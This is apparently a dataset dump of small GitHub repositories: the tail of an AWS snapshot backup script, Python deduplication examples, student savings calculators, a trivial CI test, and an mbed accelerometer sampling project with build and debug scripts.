each in self.log_snapshots_created.keys():\n self.logger.info(each)\n try:\n for each in 
self.log_snapshots_to_delete.keys():\n self.logger.info(each)\n except:\n pass\n self.logger.info(\"AWS snapshot script -----------------> Complete: \" + datetime.now().strftime(\"%m-%d-%Y %H:%M:%S\"))\n\n def main(self):\n print \"Filter key: %s\" % self.options.key\n print \"Filter tag: %s \" % self.options.tag\n self.getInstancesFull()\n self.takeSnapshotsFull()\n self.getSnapshotsFull()\n self.reportBackup()\n\ndef parseit():\n parser = OptionParser()\n parser.add_option(\"-a\", \"--all\", action=\"store\", dest=\"all\", default=\"default\",\n \t\t help=\"Makes a backup of all found volumes that are in use.\")\n parser.add_option(\"-p\", \"--profile\", action=\"store\", dest=\"profile\", default=\"default\",\n \t\t help=\"The INI profile to select. Reads profiles from ~/.aws/credentials\")\n parser.add_option(\"-k\", \"--key\", action=\"store\", dest=\"key\", default=\"Environment\",\n \t\t help=\"The tag key. Defaults to Environment.\")\n parser.add_option(\"-m\", \"--max\", action=\"store\", dest=\"max\", default=\"3\",\n \t\t help=\"Maximum snapshots to keep. Defaults to 3.\")\n parser.add_option(\"-t\", \"--tag\", action=\"store\", dest=\"tag\", default=\"default\",\n \t\t help=\"The tag value. Defaults to default.\")\n (options, args) = parser.parse_args()\n profile = ConfigParser()\n try:\n profile.read(os.path.expanduser('~/.aws/credentials'))\n except:\n print \"Missing AWS credentials file. Exiting.\"\n parser.print_help()\n try:\n profile.get(options.profile, 'aws_access_key_id')\n profile.get(options.profile, 'aws_secret_access_key')\n except:\n print \"Profile %s doesn't exist. Exiting.\" % options.profile\n parser.print_help()\n\n return (options, args, profile)\n\ndef run():\n (options, args, profile) = parseit()\n x = AwsBackups(options, args, profile)\n x.main()\n\nif __name__=='__main__':\n run()\n"
}
] | 3 |
liuxinxin885/Thecommonlyusedskill
|
https://github.com/liuxinxin885/Thecommonlyusedskill
|
db9ba9b1b18b353bbfec0fb74284e88cd0141cf6
|
3bb165e0e205ce135ed769d3aac12eb086b05e9c
|
94aa6e6cb5beafd3bf641c8cc75e058a6551055a
|
refs/heads/master
| 2022-11-30T12:23:56.781290 | 2020-07-30T01:37:52 | 2020-07-30T01:37:52 | 283,641,114 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5410256385803223,
"alphanum_fraction": 0.6230769157409668,
"avg_line_length": 22.399999618530273,
"blob_id": "f26d233017e58f2d2f54c0210647c01e46092e7d",
"content_id": "683b4b4d6d44faecb4684e6e7d52672969e828c4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1324,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 50,
"path": "/去重.py",
"repo_name": "liuxinxin885/Thecommonlyusedskill",
"src_encoding": "UTF-8",
"text": "# @Time : 2020/7/30 0030 9:26 \n# @Author : liuxinxin885\n# @File : 去重.py \n# @Software: PyCharm\n# 对列表去重\n# 循环查找\nli = [1,2,3,3,4,2,3,4,5,6,1]\nnews_li = []\nfor i in li:\n if i not in news_li:\n news_li.append(i)\nprint (news_li)\n# 使用集合的特性\nli1 = [1,4,3,3,4,2,3,4,5,6,1]\nnew_li1 = list(set(li1))\n# .使用itertools模块的grouby方法\nimport itertools\nli2 = [1,4,3,3,4,2,3,4,5,6,1]\nli2.sort() # 排序\nit = itertools.groupby(li2)\nfor k, g in it:\n print (k)\n# 使用while循环遍历\ndef quchong(lb):\n for x in lb:\n while lb.count(x)>1:\n del lb[lb.index(x)]\n return lb\nli3 = [1,4,3,3,4,2,3,4,5,6,1]\nprint(quchong(li3))\n# 使用keys()\nli4 = [1,0,3,7,7,5]\nformatli = list({}.fromkeys(li4).keys())\nprint (formatli)\n# 对数据框去重\n# 用unique()对单属性列去重\nimport pandas as pd\ndata = {'id':['A','B','C','C','C','A','B','C','A'],'age':[18,20,14,10,50,14,65,14,98]}\ndata = pd.DataFrame(data)\ndata.id.unique()\n#或者\nimport numpy as np\nnp.unique(data.id)\n# 用frame.drop_duplicates()对单属性列去重\ndata.drop_duplicates(['id'])\n# 用frame.drop_duplicates()对多属性列去重\ndata.drop_duplicates(['id','age'])\n# 用frame.duplicated()对多属性列去重\nisduplicated = data.duplicated(['id','age'],keep='first')\ndata.loc[~isduplicated,:]\n"
}
] | 1 |
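The 去重.py record above walks through several list-deduplication techniques; one point worth making explicit is that its set-based variant discards the original order. A minimal order-preserving alternative (not part of the repository; it relies on dicts keeping insertion order, guaranteed since Python 3.7):

    items = [1, 2, 3, 3, 4, 2, 3, 4, 5, 6, 1]
    # dict.fromkeys keeps the first occurrence of each value, in order
    deduped = list(dict.fromkeys(items))
    print(deduped)  # [1, 2, 3, 4, 5, 6]

This is the same idea as the {}.fromkeys(...) idiom in the record, written directly on the dict class.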
msg2fahd/pipeline_2
|
https://github.com/msg2fahd/pipeline_2
|
4b2b4fc95c2255abd21debce260186c3d927fadd
|
746183776950a2531f2a5de76854e1e0e6b193fb
|
f8b5b1ede55954c5df54c8b9099708eb30d0b9ef
|
refs/heads/master
| 2023-01-21T19:27:01.665457 | 2020-11-23T05:09:09 | 2020-11-23T05:09:09 | 315,205,464 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5636363625526428,
"alphanum_fraction": 0.6363636255264282,
"avg_line_length": 10,
"blob_id": "82f9955fcba66377376ed890308da803ffae06ed",
"content_id": "cf95ae800f66413d7c342277d45daa3d51260fe6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 55,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 5,
"path": "/test.py",
"repo_name": "msg2fahd/pipeline_2",
"src_encoding": "UTF-8",
"text": "a=10\nb=30\nc=a+b\nprint(c)\nprint('i am from test area.')\n"
},
{
"alpha_fraction": 0.692307710647583,
"alphanum_fraction": 0.692307710647583,
"avg_line_length": 26,
"blob_id": "299498f840e6f51867864f418b37b62d5eee5a9c",
"content_id": "9e35f4c89ba08e1b357b09897d9515a4f4485387",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 26,
"license_type": "no_license",
"max_line_length": 26,
"num_lines": 1,
"path": "/build.sh",
"repo_name": "msg2fahd/pipeline_2",
"src_encoding": "UTF-8",
"text": "echo ' hi i am build file'"
}
] | 2 |
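The pipeline_2 record is a minimal CI exercise: a shell build step plus a Python test script. A sketch of how a pipeline stage might chain the two locally; the file names come from the record, but the wrapper itself is an illustration, not part of the repository:

    import subprocess

    # Run the build step, then the test script; stop at the first failure.
    for cmd in (["sh", "build.sh"], ["python", "test.py"]):
        result = subprocess.run(cmd)
        if result.returncode != 0:
            raise SystemExit(result.returncode)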
bilalahmad1994/DataScienceBootCamp_NED
|
https://github.com/bilalahmad1994/DataScienceBootCamp_NED
|
47620151323744aab3b783541ace52f42be59a3b
|
a919a20f794b1047969002b8ae7b85b45eb6ebab
|
1f865aab43a665d1d8eb5587f4de753f0d2e0bd4
|
refs/heads/master
| 2021-07-20T16:22:33.081387 | 2017-10-30T21:43:19 | 2017-10-30T21:43:19 | 108,859,845 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7067092657089233,
"alphanum_fraction": 0.7456868886947632,
"avg_line_length": 25.982759475708008,
"blob_id": "651e7dc6321b82e41a0a0742a6915df21aa2e81b",
"content_id": "b207b34e78045aaa8def3ce92baf228b26ab2cf2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1565,
"license_type": "no_license",
"max_line_length": 88,
"num_lines": 58,
"path": "/assignment module1/ps1a.py",
"repo_name": "bilalahmad1994/DataScienceBootCamp_NED",
"src_encoding": "UTF-8",
"text": "# we have to calculate downpayment cost not total cost with downpayment\n\n# enter your dream house that u want to buy\ntotalcost=float(input(\"enter cost of your dream house\"))\n# enter the percent that you saved from salary e,g 5%=0.05\nportionsaved=float(input(\"enter the percent salary to save as a decimal\")) #\n# enter your annual salary\nannualsalary=float(input(\"enter ur annual salary\"))\n\n# monthly salary 120000 will calculate 10000 per month\nmonthly_salary=float(annualsalary /12)\n# current saving in month 0\ncurrentsaving=float(0)\n# downpayment 0.25*120000\ndownpayment=0.25*totalcost\n# annual return that you saved from annual salary means 4%\nannual_return=0.04\nsavingannualsalary= annual_return/ 12\n\n# monthlysaved=monthly_salary*0.1\n\nmonthly=0\nwhile currentsaving < downpayment:\n monthly +=1\n monthlyreturn=(currentsaving*savingannualsalary)\n currentsaving=currentsaving+(monthlyreturn+monthly_salary*portionsaved)\nprint(\"number of month\",monthly)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n# annual_salary=float(input(\"Enter your annual salary: \"))\n# portion_saved=float(input(\"Enter the percent of your salary to save, as a decimal: \"))\n# total_cost=float(input(\"Enter the cost of your dream home: \"))\n# portion_down_payment=0.25*total_cost\n# current_savings=float(0)\n# monthly_salary=float(annual_salary/12)\n# r=0.04\n# rate=0.04/12\n# monthly_savings=monthly_salary*0.1\n# m=0\n# while current_savings < portion_down_payment:\n# returns = (current_savings * r / 12)\n# current_savings = current_savings + ( returns + monthly_salary*portion_saved )\n# m+=1\n# print(m)\n"
},
{
"alpha_fraction": 0.7219020128250122,
"alphanum_fraction": 0.7579250931739807,
"avg_line_length": 33.650001525878906,
"blob_id": "e94d098dc05788702a16ec14c00ae1c939e48a58",
"content_id": "865d860c406dcdbc94b8ad0e7ddf1d11824b1f49",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1388,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 40,
"path": "/assignment module1/ps1b.py",
"repo_name": "bilalahmad1994/DataScienceBootCamp_NED",
"src_encoding": "UTF-8",
"text": "# we have to calculate downpayment cost not total cost with downpayment\n\n# enter your dream house that u want to buy\ntotalcost=float(input(\"enter cost of your dream house\"))\n# enter the percent that you saved from salary e,g 5%=0.05\nportionsaved=float(input(\"enter the percent salary to save as a decimal\")) #\n# enter your annual salary\nannualsalary=float(input(\"enter ur annual salary\"))\n\n#enter the value in percentage how ur salary\nannualsalaryinc=float(input(\"enter ur semi annual raise after 6months incremenr\"))\n\n\n# monthly salary 120000 will calculate 10000 per month\nmonthly_salary=float(annualsalary /12)\n# current saving in month 0\ncurrentsaving=float(0)\n# downpayment 0.25*120000\ndownpayment=0.25*totalcost\n# annual return that you saved from annual salary means 4%\nannual_return=0.04\nsavingannualsalary= annual_return/ 12\n\n# monthlysaved=monthly_salary*0.1\n\nmonthly=0\nwhile currentsaving < downpayment:\n monthly +=1\n monthlyreturn=(currentsaving*savingannualsalary)\n currentsaving=currentsaving+(monthlyreturn+monthly_salary*portionsaved)\n\n\n if monthly%6==0:\n annualsalary+=annualsalary * annualsalaryinc\n print('number of months after increment in 6',monthly)\n # elif monthly % 12==0:\n # annualsalary = annualsalary * annualsalaryinc\n # print('number of months after increment in 12',monthly)\n\n# print(\"number of month\",monthly)\n\n\n"
},
{
"alpha_fraction": 0.6645161509513855,
"alphanum_fraction": 0.7204301357269287,
"avg_line_length": 25.514286041259766,
"blob_id": "6c6db217ccb82b46a322e33684c9b03c55d4f26e",
"content_id": "91e033a903c44c37430e51215798d31c4544c61c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 930,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 35,
"path": "/assignment module1/ps1c.py",
"repo_name": "bilalahmad1994/DataScienceBootCamp_NED",
"src_encoding": "UTF-8",
"text": "annualsalary=150000\nsemi_annual_raise=0.07\nannual_return=0.04\ndownpayment=0.25*annualsalary\ncosthouse=1000000\nmonthsalary=annualsalary/12\ncurrentsaving=0\nminrate=int(0)\nmaxrate=input(1000)\nsav_annualsalary=annual_return/12\nportion_downpayment= costhouse * 0.25\nmonthlysalary=float(annualsalary/12)\nportionsaved=float((maxrate-minrate)/2)\nmonthly=0\n\n\n\nwhile(currentsaving<downpayment):\n monthly+= 1\n monthlyreturn = (currentsaving * monthsalary)\n currentsaving = currentsaving + (monthlyreturn + monthlysalary * portionsaved)\n\n for i in range(1,37):\n if monthly % 6 == 0:\n annualsalary += annualsalary * semi_annual_raise\n\n if currentsaving < portion_downpayment:\n maxrate = portionsaved\n else:\n high = portionsaved\n portion_saved = (maxrate + minrate) / 20000.0\n monthly += 1\n\n print(\"Best savings rate: \", portionsaved)\n print(\"Steps in bisection search\", monthly)\n\n\n"
}
] | 3 |
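The three problem-set scripts above share one inner loop: compound monthly returns plus a fixed fraction of salary, with an optional semi-annual raise. A self-contained sketch of that loop as a reusable function; the function name and defaults are illustrative, not taken from the repository:

    def months_to_save(total_cost, annual_salary, portion_saved,
                       semi_annual_raise=0.0, annual_return=0.04):
        # Number of months needed to save a 25% down payment.
        down_payment = 0.25 * total_cost
        savings = 0.0
        months = 0
        while savings < down_payment:
            months += 1
            savings += savings * annual_return / 12          # investment return
            savings += (annual_salary / 12) * portion_saved  # monthly deposit
            if semi_annual_raise and months % 6 == 0:
                annual_salary += annual_salary * semi_annual_raise
        return months

    print(months_to_save(1000000, 120000, 0.10))  # ps1a-style scenario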
elken/SOFT253_referral
|
https://github.com/elken/SOFT253_referral
|
c5d6d621aa5bf7fa29fc9aaa923d9966b52062ef
|
220ba11d444881a8a11100735ec31643d30096b8
|
11050fb7d58504177a658d83f303b1672145455f
|
refs/heads/master
| 2021-01-19T11:14:46.669074 | 2016-08-02T18:15:05 | 2016-08-02T18:15:05 | 63,878,700 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5645161271095276,
"alphanum_fraction": 0.5645161271095276,
"avg_line_length": 30,
"blob_id": "86f20bf64df9527c778b857ef2449e51f08f1797",
"content_id": "ea76acea248ddecb6d7a1e746dc30d532d48b3b3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 62,
"license_type": "permissive",
"max_line_length": 50,
"num_lines": 2,
"path": "/scripts/watch.sh",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#! /bin/sh\nfswatch -o src/ | xargs -I {} ./scripts/copy.sh {}\n"
},
{
"alpha_fraction": 0.5789473652839661,
"alphanum_fraction": 0.5789473652839661,
"avg_line_length": 8.5,
"blob_id": "51460ba06045c67001ad461bb9835b23d1630234",
"content_id": "4e15748fb594293ab6a6e59ba0f898a97f10ea2a",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 19,
"license_type": "permissive",
"max_line_length": 10,
"num_lines": 2,
"path": "/scripts/copy.sh",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#! /bin/sh\npio run\n"
},
{
"alpha_fraction": 0.4318554997444153,
"alphanum_fraction": 0.46962234377861023,
"avg_line_length": 13.162790298461914,
"blob_id": "f4727963a103eebe5bec8e48ea2c2c04ece45d43",
"content_id": "e50453518d5b5ec913d09c09331e7950c8089ba0",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 609,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 43,
"path": "/src/data.hpp",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#ifndef __DATA_H__\n#define __DATA_H__\n#include \"mbed.h\"\n\nclass Data {\n int32_t _x;\n int32_t _y;\n int32_t _z;\n\npublic:\n Data() : _x(0), _y(0), _z(0) {};\n Data(int32_t x, int32_t y, int32_t z) : _x(x), _y(y), _z(z) {};\n\n Data operator+ (const Data& rhs) {\n _x += rhs.x();\n _y += rhs.y();\n _z += rhs.z();\n\n return *this;\n }\n\n Data operator/ (int32_t divisor) {\n _x /= divisor;\n _y /= divisor;\n _z /= divisor;\n\n return *this;\n }\n\n int32_t x() const {\n return _x;\n }\n\n int32_t y() const {\n return _y;\n }\n\n int32_t z() const {\n return _z;\n }\n};\n\n#endif //__DATA_H__\n"
},
{
"alpha_fraction": 0.7725321650505066,
"alphanum_fraction": 0.7896995544433594,
"avg_line_length": 18.33333396911621,
"blob_id": "5d2bab07f098de0d040c863da63d85cbf3d04dcb",
"content_id": "8c7c599317b2c106579f73ca0d811fe58289612c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "permissive",
"max_line_length": 39,
"num_lines": 12,
"path": "/scripts/gdb.py",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n\nfrom pyOCD.gdbserver import GDBServer\nfrom pyOCD.board import MbedBoard\n\nimport logging\nlogging.basicConfig(level=logging.INFO)\n\nboard = MbedBoard.chooseBoard()\n\n# start gdbserver\ngdb = GDBServer(board, 3333)\n\n"
},
{
"alpha_fraction": 0.714102566242218,
"alphanum_fraction": 0.75,
"avg_line_length": 27.851852416992188,
"blob_id": "f5332e43bf24ee9a25d9669fe11bbcef4c6f6c84",
"content_id": "505033e46e35261c4c9f89c9586be3fccea1f08b",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "INI",
"length_bytes": 780,
"license_type": "permissive",
"max_line_length": 201,
"num_lines": 27,
"path": "/platformio.ini",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "\n# Project Configuration File\n#\n# A detailed documentation with the EXAMPLES is located here:\n# http://docs.platformio.org/en/latest/projectconf.html\n#\n\n# A sign `#` at the beginning of the line indicates a comment\n# Comment lines are ignored.\n\n# Simple and base environment\n# [env:mybaseenv]\n# platform = %INSTALLED_PLATFORM_NAME_HERE%\n# framework =\n# board =\n#\n# Automatic targets - enable auto-uploading\n# targets = upload\n\n\n# ST STM32 Platform\n[env:nucleo_f401re]\nplatform = ststm32\nframework = mbed\nboard = nucleo_f401re\nupload_port = /Volumes/NODE_F401RE\ntargets = upload\nbuild_flags = -I./lib/X_NUCLEO_IKS01A1/X_NUCLEO_COMMON/DevI2C -I./lib/X_NUCLEO_IKS01A1/Components/Common -I./lib/X_NUCLEO_IKS01A1/Components/Interfaces -I./lib/X_NUCLEO_IKS01A1/Components -std=c++11 -g\n"
},
{
"alpha_fraction": 0.665217399597168,
"alphanum_fraction": 0.6763118505477905,
"avg_line_length": 33.92146682739258,
"blob_id": "ade3fc42a1e8b834acfcc6c6067af1993832d4c9",
"content_id": "df96b3cc924ba76b2584a6d38add03bd87bea563",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 6670,
"license_type": "permissive",
"max_line_length": 208,
"num_lines": 191,
"path": "/src/main.cpp",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "/**\n ******************************************************************************\n * @file main.cpp\n * @author AST / EST\n * @version V0.0.1\n * @date 14-August-2015\n * @brief Simple Example application for using the X_NUCLEO_IKS01A1\n * MEMS Inertial & Environmental Sensor Nucleo expansion board.\n ******************************************************************************\n * @attention\n *\n * <h2><center>© COPYRIGHT(c) 2015 STMicroelectronics</center></h2>\n *\n * Redistribution and use in source and binary forms, with or without modification,\n * are permitted provided that the following conditions are met:\n * 1. Redistributions of source code must retain the above copyright notice,\n * this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright notice,\n * this list of conditions and the following disclaimer in the documentation\n * and/or other materials provided with the distribution.\n * 3. Neither the name of STMicroelectronics nor the names of its contributors\n * may be used to endorse or promote products derived from this software\n * without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS \"AS IS\"\n * AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE\n * DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR\n * SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER\n * CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,\n * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\n * OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n *\n ******************************************************************************\n\n\n HINTS:\n\n Use a Ticker for accurate sampling, but do NOT use printf or locks inside an ISR. Instead, use a MailBox to safely move data across from an ISR to a Thread\n Many functions in MBED are thread-safe - check the online docs\n\n For buffering, use an Array (of structures) and the producer-consumer pattern (or a variant of it).\n DO NOT use a mailbox or queue to perform the buffering\n\n Perform serial comms on another thread\n\n Beware of a thread running out of stack space. If you have to use a lot of local variable data, consider increasing the size of the stack for the respective thread. See the constructor for Thread in the docs\n\n In terms of diagnostics, consider the following type of information:\n\n An indication that the sampling is running (not every sample maybe, but a heart-beat type indication)\n An error if the buffer is full\n An warning if the buffer is empty\n Anything that helps diagnose a deadlock (e.g. 
output a message / toggle an LED before a lock is taken and after it is released)\n\n For high marks in the logging aspect, remember that although printf is thread safe (not interrupt safe), printf from multiple threads will result in interleaved text.\n To solve this, have a logging thread that queues up whole messages and write them to the serial interface one at a time - this is ambitious but can be done\n*/\n\n/* Includes */\n#include \"mbed.h\"\n#include \"rtos.h\"\n#include \"x_nucleo_iks01a1.h\"\n#include \"cmsis_os.h\"\n#include \"data.hpp\"\n\n#define DEBUG 0\n#define MAX_MESSAGES 16\n#define MAX_ITEMS 10\n#define CAPACITY (MAX_ITEMS + 1)\n\n/* Instantiate the expansion board */\nstatic X_NUCLEO_IKS01A1 *mems_expansion_board = X_NUCLEO_IKS01A1::Instance(D14, D15);\n\n/* Retrieve the composing elements of the expansion board */\nstatic MotionSensor *accelerometer = mems_expansion_board->GetAccelerometer();\n\nSerial pc(USBTX, USBRX);\n\n// Message struct for the message queue\nstruct Message {\n const char* message;\n};\n\nTicker ticker;\nMail<Data, MAX_ITEMS> dataMailBox;\nMail<Message, MAX_MESSAGES> messageBox;\nData samples[CAPACITY];\nint32_t sampleCount = 0;\nMutex* averageLock = new Mutex();\nSemaphore* logSemaphore = new Semaphore(MAX_MESSAGES);\n\n// Send a message to the message box\nvoid sendMessage(const char* msg) {\n logSemaphore->wait();\n Message* m = messageBox.calloc();\n m->message = msg;\n messageBox.put(m);\n}\n\n// Print all messages in the mailbox\nvoid printMessages(void const*) {\n while (true) {\n osEvent evt = messageBox.get(1000);\n if (evt.status == osEventMail) {\n Message* m = (Message*) evt.value.p;\n pc.printf(m->message);\n messageBox.free(m);\n }\n logSemaphore->release();\n }\n}\n\n// Sample data every 100ms, send error to log thread where applicable\nvoid sampleData() {\n int32_t axes[3];\n averageLock->lock();\n#if DEBUG\n sendMessage(\"Sample data got lock\\r\\n\");\n#endif\n accelerometer->Get_X_Axes(axes);\n Data* accelData = dataMailBox.alloc();\n\n accelData = new Data(axes[0], axes[1], axes[2]);\n osStatus status = dataMailBox.put(accelData);\n averageLock->unlock();\n#if DEBUG\n sendMessage(\"Sample data lost lock\\r\\n\");\n#endif\n\n if (status == osErrorResource) {\n#if DEBUG\n char message[50];\n sprintf(message, \"Resource not available (%4Xh)\\r\\n\", status);\n sendMessage(message);\n#endif\n }\n}\n\n/* Simple main function */\nint main() {\n#if DEBUG\n sendMessage(\"\\r\\n--- Starting new debug run---\\r\\n\");\n#else\n sendMessage(\"\\r\\n--- Starting new run---\\r\\n\");\n#endif\n\n\n#if DEBUG\n uint8_t id;\n accelerometer->ReadID(&id);\n char message[50];\n sprintf(message, \"LSM6DS0 Accelerometer = 0x%X\\r\\n\", id);\n sendMessage(message);\n#endif\n\n Thread logging(printMessages);\n ticker.attach(&sampleData, 0.1);\n\n while(1) {\n osEvent evt = dataMailBox.get();\n if (evt.status == osEventMail) {\n Data* mailData = (Data*) evt.value.p;\n samples[sampleCount] = *mailData;\n sampleCount = (sampleCount + 1) % CAPACITY;\n if (sampleCount == MAX_ITEMS) {\n averageLock->lock();\n Data averages;\n#if DEBUG\n sendMessage(\"Main got lock\\r\\n\");\n#endif\n for (int i = 0; i < MAX_ITEMS; i++) {\n averages = averages + samples[i];\n }\n averages = averages / 10;\n char message[64];\n sprintf(message, \"Average: \\tx: %ld\\t y: %ld\\t z: %ld\\r\\n\", averages.x(), averages.y(), averages.z());\n sendMessage(message);\n averages = Data();\n averageLock->unlock();\n#if DEBUG\n sendMessage(\"Main lost lock\\r\\n\");\n#endif\n }\n 
dataMailBox.free(mailData);\n sleep();\n }\n }\n}\n"
},
{
"alpha_fraction": 0.47756606340408325,
"alphanum_fraction": 0.49907806515693665,
"avg_line_length": 20.407894134521484,
"blob_id": "174fd46f9a8b874ec2a6b0f3aeb9ad3f4a76e6df",
"content_id": "836bc886d0106aaa1dc072fb83cd856b46632e02",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1627,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 76,
"path": "/src/Buffer.h",
"repo_name": "elken/SOFT253_referral",
"src_encoding": "UTF-8",
"text": "#include <atomic>\n#include <cstddef>\n\ntemplate <class T, int32_t m_capacity>\nclass Buffer {\n int32_t m_size;\n std::atomic<int32_t> m_head;\n std::atomic<int32_t> m_tail;\n\n T* m_data;\n\npublic:\n Buffer() : m_size(0), m_head(0), m_tail(0) {\n m_data = new T[m_capacity];\n }\n ~Buffer();\n\n int32_t size() {\n return m_size;\n }\n\n int32_t capacity() {\n return m_capacity;\n }\n\n bool push(T& item) {\n int32_t head = m_head.load(std::memory_order_relaxed);\n int32_t nextHead = (head + 1) % m_capacity;\n\n if (nextHead == m_tail.load(std::memory_order_acquire)) {\n return false;\n }\n\n m_data[head] = item;\n m_head.store(nextHead, std::memory_order_release);\n\n m_size++;\n return true;\n\n // if ((m_head == 0 && m_tail == m_capacity) || m_head == m_tail + 1) {\n // return false;\n // } else if (m_head == -1 && m_tail == -1) {\n // m_head = 0;\n // m_tail = 0;\n // m_data[m_head] = item;\n // m_size++;\n // } else if (m_tail == m_size) {\n // m_tail = 0;\n // m_data[m_tail] = item;\n // m_size++;\n // }\n }\n\n bool pop(T& item) {\n int32_t tail = m_tail.load(std::memory_order_relaxed);\n if (tail == m_head.load(std::memory_order_acquire)) {\n return false;\n }\n\n item = m_data[tail];\n m_tail.store((tail + 1) % m_capacity, std::memory_order_release);\n\n m_size--;\n return true;\n // T result = nullptr;\n // if (m_head == -1 && m_tail == -1) {\n // return result;\n // } else {\n // if (m_head == m_tail) {\n // m_data[m_head] = 0;\n // m_head = -1;\n // m_tail = -1;\n // }\n // }\n }\n};\n"
}
] | 7 |
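The main.cpp record above implements exactly the pattern its HINTS block describes: a periodic sampler producing readings into a mailbox and a consumer averaging every ten. The stdlib-only Python sketch below mirrors that producer-consumer averaging with a faked sensor; none of it is mbed API, and the sizes simply echo the record's constants.

    import queue
    import random
    import threading
    import time

    mailbox = queue.Queue(maxsize=10)  # bounded, like the CMSIS Mail

    def sampler():
        # Producer: pretend to read an accelerometer every 100 ms.
        while True:
            sample = tuple(random.randint(-100, 100) for _ in range(3))
            try:
                mailbox.put(sample, block=False)
            except queue.Full:
                pass  # the real design logs a "buffer full" diagnostic here
            time.sleep(0.1)

    def consumer():
        # Consumer: average every 10 samples, as main() does in the record.
        batch = []
        while True:
            batch.append(mailbox.get())
            if len(batch) == 10:
                x, y, z = (sum(axis) // 10 for axis in zip(*batch))
                print("Average: x: %d  y: %d  z: %d" % (x, y, z))
                batch.clear()

    threading.Thread(target=sampler, daemon=True).start()
    consumer()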